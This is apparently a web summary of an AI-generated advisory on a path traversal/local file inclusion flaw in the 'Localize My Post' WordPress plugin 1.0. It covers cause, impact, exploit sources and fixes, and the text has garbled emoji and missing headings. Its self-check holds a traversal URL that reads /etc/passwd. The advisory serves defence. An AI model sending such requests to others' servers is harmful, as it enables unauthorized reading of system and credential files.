This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: A Path Traversal/Local File Inclusion (LFI) flaw in the 'Localize My Post' WordPress plugin.β¦
π‘οΈ **Root Cause**: The `ajax/include.php` file fails to filter the `file` parameter. β οΈ **CWE**: Lack of input validation allowing directory traversal sequences (`../`) to access unauthorized files.
Q3Who is affected? (Versions/Components)
π¦ **Affected**: WordPress sites using the **Localize My Post** plugin. π **Version**: Specifically **Version 1.0**. π **Platform**: PHP/MySQL based WordPress blogs.
Q4What can hackers do? (Privileges/Data)
π **Capabilities**: Hackers can read arbitrary files from the server. π **Impact**: Access to sensitive config files, source code, or potentially execute code if combined with other vectors.β¦
π **Threshold**: Low. βοΈ **Config**: No authentication required for the vulnerable `ajax/include.php` endpoint. π **Access**: Publicly accessible via the web interface, making it easy to exploit remotely.
Q6Is there a public Exp? (PoC/Wild Exploitation)
π₯ **Exploit**: Yes. π **Sources**: Public exploits available on Exploit-DB (ID: 45439) and PacketStorm. π§ͺ **PoC**: Nuclei templates and mailing list disclosures confirm active wild exploitation potential.
Q7How to self-check? (Features/Scanning)
π **Check**: Scan for the presence of the `Localize My Post` plugin. π― **Test**: Attempt to access `wp-content/plugins/localize-my-post/ajax/include.php?file=../../etc/passwd` (or equivalent system file).β¦
π οΈ **Fix**: Update the plugin to a patched version if available. π« **Action**: If no patch exists, the vendor repository (GitHub issues) suggests the plugin may be abandoned or requires manual code review.β¦
π§ **Workaround**: Disable or uninstall the 'Localize My Post' plugin immediately. π **Mitigation**: Block access to `ajax/include.php` via WAF rules or `.htaccess` if the plugin is critical but unpatchable.β¦
π΄ **Priority**: High. π **Age**: Published in 2018, but LFI remains a critical threat. π **Urgency**: Immediate action required if the vulnerable plugin is active.β¦